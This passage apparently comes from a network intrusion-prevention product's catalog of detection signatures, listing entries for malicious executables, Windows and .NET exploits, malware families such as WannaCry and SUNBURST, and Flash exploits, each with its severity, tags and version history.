About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2013-01, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Microsoft-.NET-Framework-Winforms-Buffer-Overflow
Description:
Back to top

File-Exe_Microsoft-.NET-Framework-Winforms-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2013-01, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Microsoft-.NET-Framework-Winforms-Information-Disclosure
Description:
Back to top

File-Exe_Microsoft-.NET-Framework-Xaml-Browser-Applications-Stack-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft .NET Framework, MS2011-04, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-632-5211
Vulnerability: Microsoft-.NET-Framework-Xaml-Browser-Applications-Stack-Corruption
Description:
Back to top

File-Exe_Microsoft-Edge-Elevation-of-Privilege-CVE-2019-0566

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-01, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1124-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Elevation-of-Privilege-CVE-2019-0566
Description:
Back to top

File-Exe_Microsoft-Graphics-Component-CVE-2016-3348

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-09, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: Microsoft-Graphics-Component-CVE-2016-3348
Description:
Back to top

File-Exe_Microsoft-Outlook-Object-Security-Bypass-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, Microsoft Office, CVE2004, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-610-5211
Vulnerability: Microsoft-Outlook-Object-Security-Bypass-Vulnerability
Description:
Back to top

File-Exe_Microsoft-Silverlight-Vulnerability-CVE-2016-0034

About this situation: An attempt to exploit a vulnerability in Microsoft Silverlight detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Silverlight, MS2016-01, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-742-5211
Vulnerability: Microsoft-Silverlight-Vulnerability-CVE-2016-0034
Description:
Back to top

File-Exe_Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-659-5211
Vulnerability: Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability
Description:
Back to top

File-Exe_Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability
Description:
Back to top

File-Exe_Microsoft-Windows-Font-Library-File-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-10, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-610-5211
Vulnerability: Microsoft-Windows-Font-Library-File-Buffer-Overflow
Description:
Back to top

File-Exe_Microsoft-Windows-OTF-Fonts-Kernel-Vulnerability-CVE-2015-2426

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-665-5211
Vulnerability: Microsoft-Windows-OTF-Fonts-Kernel-Vulnerability-CVE-2015-2426
Description:
Back to top

File-Exe_Microsoft-Windows-PE-File-DVRT-Parsing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-05, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Vulnerability: Microsoft-Windows-PE-File-DVRT-Parsing-Denial-Of-Service
Description:
Back to top

File-Exe_Microsoft-Windows-PE-File-Signature-Spoofing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1643-5242
Vulnerability: Microsoft-Windows-PE-File-Signature-Spoofing-Vulnerability
Description:
Back to top

File-Exe_Microsoft-Windows-SmartScreen-Security-Feature-Bypass-CVE-2022-44698

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2022-12, CVE2022, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Vulnerability: Microsoft-Windows-SmartScreen-Security-Feature-Bypass-CVE-2022-44698
Description:
Back to top

File-Exe_Microsoft-Windows-WinVerifyTrust-PE-Validation-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Executable File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Any Hardware, MS2013-12, CVE2013, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-557-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Microsoft-Windows-WinVerifyTrust-PE-Validation-Security-Bypass
Description:
Back to top

File-Exe_Microsoft-Windows-WinVerifyTrust-Signature-Validation-CVE-2012-0151

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: Executable File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2012-04, CVE2012, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-610-5211
Vulnerability: Microsoft-Windows-WinVerifyTrust-Signature-Validation-CVE-2012-0151
Description:
Back to top

File-Exe_Microsoft_Windows_CryptoAPI_Spoofing_Vulnerability_CVE-2020-0601

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2020-01, CVE2020, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1218-5242
Vulnerability: Microsoft_Windows_CryptoAPI_Spoofing_Vulnerability_CVE-2020-0601
Description:
Back to top

File-Exe_MS-DOS-Executable

About this situation: MS-DOS executable file detected
Context: Executable File Stream
Severity: 1
Tags: Windows, OS/2, x86, Windows not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Exe_New-Executable

About this situation: New executable (NE) file detected
Context: Executable File Stream
Severity: 1
Tags: Windows, OS/2, Any Hardware, Windows not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Exe_Obfuscated-Shellcode-1

About this situation: Obfuscated function call parameter setup detected
Context: Executable File Stream
Severity: 7
Tags: Windows, x86, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Exe_PEDICOM-Polyglot-File

About this situation: PEDICOM polyglot file was detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1617-5242
Vulnerability: PEDICOM-Polyglot-File
Description:
Back to top

File-Exe_Portable-Executable

About this situation: Portable executable (PE) file detected
Context: Executable File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-1633-5242
Vulnerability: File-Type-Identification
Description:
Back to top

File-Exe_Portable-Executable-32-Bit

About this situation: Detected 32-bit portable executable
Context: Executable File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-64-Bit

About this situation: Detected 64-bit portable executable
Context: Executable File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-Dynamic-Link-Libary

About this situation: Detected portable executable that is a dynamic link library (DLL)
Context: Executable File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-Header-Overlap

About this situation: File with an overlapping headers was found
Context: Executable File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-msstyles-File-Transfer

About this situation: Possible msstyles file transfer detected
Context: Executable File Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1633-5242
Last changed: sgpkg-ips-1633-5242
Vulnerability: Portable-Executable-msstyles-File-Transfer
Description:
Back to top

File-Exe_Portable-Executable-Nonstandard-Optional-Header-Signature

About this situation: Detected portable executable that contains unusual optional header signature
Context: Executable File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-Nonstandard-Optional-Header-Size

About this situation: Detected portable executable that contains unusual optional header size
Context: Executable File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-OCRA-Application

About this situation: Detected portable executable created with One Click Ruby Application framework
Context: Executable File Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Protocol Information
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Description:
Back to top

File-Exe_Portable-Executable-Unknown-Architecture

About this situation: Detected portable executable that can be executed in unknown architecture
Context: Executable File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-Windows-Console-Application

About this situation: Detected portable executable that is a Windows console application
Context: Executable File Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-Windows-GUI-Application

About this situation: Detected portable executable that is a Windows GUI application
Context: Executable File Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-Windows-Native-Subsystem

About this situation: Detected portable executable that is executed by the Windows Native subsystem
Context: Executable File Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-Windows-OS2-Subsystem

About this situation: Detected portable executable that is a executed by Windows' OS/2 subsystem
Context: Executable File Stream
Severity: 1
Tags: Windows NT, Windows 2000, Any Hardware, Windows NT not specific, Windows 2000 not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-Windows-POSIX-Subsystem

About this situation: Detected portable executable that is a executed by Windows' POSIX subsystem
Context: Executable File Stream
Severity: 1
Tags: Windows NT, Windows 2000, Any Hardware, Windows NT not specific, Windows 2000 not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-Windows-Unknown-Subsystem

About this situation: Detected portable executable that is a executed by an unusual Windows' subsystem
Context: Executable File Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-x86

About this situation: Detected portable executable that can be executed in x86 architechure
Context: Executable File Stream
Severity: 1
Tags: Any Operating System, x86, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Portable-Executable-x86-64

About this situation: Detected portable executable that can be executed in x86-64 architechure
Context: Executable File Stream
Severity: 1
Tags: Any Operating System, x86-64, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Description:
Back to top

File-Exe_Possible-Shamoon-DistTrack-Executable-Download

About this situation: Possible Shamoon/DistTrack executable download
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Shamoon-DistTrack-Malware
Description:
Back to top

File-Exe_Self-Extracting-LhArc-Archive

About this situation: Self extracting lharc archive download detected
Context: Executable File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Exe_Self-Extracting-Zip-Archive

About this situation: Self extracting zip archive download detected
Context: Executable File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Exe_SmartScreen-Security-warning-Bypass-For-PE-Files-CVE-2023-24880

About this situation: An attempt to exploit a vulnerability in SmartScreen detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, SmartScreen, MS2023-03, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1565-5242
Last changed: sgpkg-ips-1580-5242
Vulnerability: SmartScreen-Security-warning-Bypass-For-MSI-Files-CVE-2023-24880
Description:
Back to top

File-Exe_Sophosencrypt-Ransomware

About this situation: An attempt to exploit a vulnerability in SophosEncrypt detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, SophosEncrypt, Windows not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1860-5242
Last changed: sgpkg-ips-1860-5242
Vulnerability: Sophosencrypt-Ransomware
Description:
Back to top

File-Exe_StalinLocker-Wiper-Binary-File

About this situation: StalinLocker wiper binary file was detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1617-5242
Vulnerability: StalinLocker-Wiper-Binary-File
Description:
Back to top

File-Exe_SunBurst-SUNBURST-Detected-1

About this situation: Executable matching the SUNBURST tool detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1307-5242
Last changed: sgpkg-ips-1307-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

File-Exe_SunBurst-SUNBURST-Detected-2

About this situation: Executable matching the SUNBURST tool detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1307-5242
Last changed: sgpkg-ips-1307-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

File-Exe_SunBurst-SUNBURST-Detected-3

About this situation: Executable matching the SUNBURST tool detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1308-5242
Last changed: sgpkg-ips-1308-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

File-Exe_SunBurst-SUPERNOVA-Detected-1

About this situation: Executable matching the SUPERNOVA tool detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1306-5242
Last changed: sgpkg-ips-1307-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

File-Exe_SunBurst-SUPERNOVA-Detected-2

About this situation: Executable matching the SUPERNOVA tool detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1306-5242
Last changed: sgpkg-ips-1307-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

File-Exe_SunBurst-TEARDROP-Detected-1

About this situation: Executable matching the TEARDROP tool detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1306-5242
Last changed: sgpkg-ips-1309-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

File-Exe_Suspected-Malicious-DLL-File

About this situation: A transfer of a DLL file containing suspicious parameters was detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1048-5242
Last changed: sgpkg-ips-1048-5242
Description:
Back to top

File-Exe_Suspicious-ELF-File-Download

About this situation: An attempt to download a suspicious ELF file detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1413-5242
Last changed: sgpkg-ips-1413-5242
Vulnerability: Suspicious-ELF-File-Download
Description:
Back to top

File-Exe_Suspicious-Executable-Download

About this situation: Suspicious executable download was detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: Suspicious-Executable-Download
Description:
Back to top

File-Exe_Suspicious-File

About this situation: A suspicious executable file was detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1863-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Exe_Symantec-AntiVirus-Engine-Decomposer-Mspack-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Norton 360 detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Norton AntiVirus, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: Symantec-AntiVirus-Engine-Decomposer-Mspack-Denial-Of-Service
Description:
Back to top

File-Exe_Symantec-AntiVirus-Engine-PE-Header-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Symantec Anti Virus Engine detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec AntiVirus Engine, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-811-5242
Last changed: sgpkg-ips-1652-5242
Vulnerability: Symantec-AntiVirus-Engine-PE-Header-Heap-Buffer-Overflow
Description:
Back to top

File-Exe_Themida-Packed-Executable

About this situation: A suspicious executable file was detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-838-5242
Last changed: sgpkg-ips-838-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Exe_Themida-Packed-Executable-2

About this situation: A suspicious executable file was detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-920-5242
Last changed: sgpkg-ips-920-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Exe_UPX-Packed-Executable

About this situation: A suspicious executable file was detected
Context: Executable File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: UPX-Packed-Executable
Description:
Back to top

File-Exe_Veil-Evading-Binary-1

About this situation: An executable file generated with Veil Evasion framework
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-805-5242
Vulnerability: Veil-Evading-Binary
Description:
Back to top

File-Exe_Veil-Evading-Binary-2

About this situation: An executable file generated with Veil Evasion framework
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-1431-5242
Vulnerability: Veil-Evading-Binary
Description:
Back to top

File-Exe_Veil-Evading-Binary-3

About this situation: An executable file generated with Veil Evasion framework
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Vulnerability: Veil-Evading-Binary
Description:
Back to top

File-Exe_Veil-Evading-Binary-4

About this situation: An executable file generated with Veil Evasion framework
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Vulnerability: Veil-Evading-Binary
Description:
Back to top

File-Exe_Wannacry-Ransomware

About this situation: A transfer of WannaCry ransomware detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WannaCry, Any Operating System not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1860-5242
Last changed: sgpkg-ips-1860-5242
Vulnerability: Wannacry-Ransomware
Description:
Back to top

File-Exe_Win32k-Elevation-of-Privilege-Vulnerability-CVE-2018-8453

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-10, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1109-5242
Last changed: sgpkg-ips-1109-5242
Vulnerability: Win32k-Elevation-of-Privilege-Vulnerability-CVE-2018-8453
Description:
Back to top

File-Exe_Windows-Local-Privilege-Escalation-CVE-2016-0167

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1305-5242
Vulnerability: Windows-Local-Privilege-Escalation-CVE-2016-0167
Description:
Back to top

File-Exe_Windows-Remote-Desktop-Protocol-Client-Information-Disclosure-Vulnerability-CVE-2019-1108

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1176-5242
Vulnerability: Windows-RDP-Client-Information-Disclosure-Vulnerability-CVE-2019-1108
Description:
Back to top

File-Exe_Writeablebitmap-Setsource-Information-Disclosure

About this situation: An attempt to exploit vulnerability in Microsoft Silverlight detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Silverlight, MS2013-10, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: Microsoft-Silverlight-Writeablebitmap-Setsource-Information-Disclosure
Description:
Back to top

File-Exe_XMRig_CPU_Miner_Binary_File

About this situation: XMRig binary file was detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1617-5242
Vulnerability: XMRig_CPU_Miner_Binary_File
Description:
Back to top

File-Filtering-Policy_Buffering-Limit-Exceeded

About this situation: File Filtering Policy Buffering Limit Exceeded
Context: Anti-Malware
Severity: 5
Tags: File Filtering
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-739-5211
Description: There is an upper limit for the data buffering in a connection that is handled according to file filtering policy. If a malware scan has been configured for the connection the scan is aborted. If the file is being transferred in multiple ranges it might not be possible to fingerprint the file. Also other file filtering policy features can be affected. Depending on the action defined for this situation in the inspection policy the connection may be terminated or let through.
Back to top

File-Filtering-Policy_Buffering-Out-Of-Memory

About this situation: Not enough memory to buffer the file
Context: Anti-Malware
Severity: 5
Tags: File Filtering
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Description: There is not enough memory for data buffering in a connection that is handled according to the file filtering policy. If an anti-malware scan has been configured for the connection, the scan is aborted. If the file is being transferred in multiple ranges, it might not be possible to fingerprint the file. Other features in the file filtering policy can also be affected. Depending on the action defined for this situation in the inspection policy, the connection might be terminated or allowed.
Back to top

File-Filtering-Policy_Not-Enough-Free-Disk-Space

About this situation: File Filtering Policy Not Enough Free Disk Space
Context: Anti-Malware
Severity: 5
Tags: File Filtering
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-739-5211
Description: Free disk space reserved for the data buffering for connections that are handled according to file filtering policy has become low. If a malware scan has been configured for this connection the scan is aborted. Also future malware scans may not be able to be done. It might not be possible to fingerprint the files that are transferred in multiple ranges. Also other file filtering policy features can be affected. Depending on the action defined for this situation in the inspection policy the connections may be terminated or let through.
Back to top

File-Flash_Adobe-authplay.dll-CVE-2010-1297-Exploit-2

About this situation: A malicious SWF file targeting CVE-2010-1297 over HTTP detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Reader, Adobe Acrobat, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-682-5211
Vulnerability: Adobe-authplay.dll-Code-Execution-CVE-2010-1297
Description:
Back to top

File-Flash_Adobe-Flash-Asnative-Null-Pointer-Dereference

About this situation: An attempt to exploit an Adobe Flash Asnative Null Pointer Dereference vulnerability detected.
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-670-5211
Vulnerability: Adobe-Flash-Asnative-Null-Pointer-Dereference
Description:
Back to top

File-Flash_Adobe-Flash-Bitmapdata-copyPixels-UAF

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
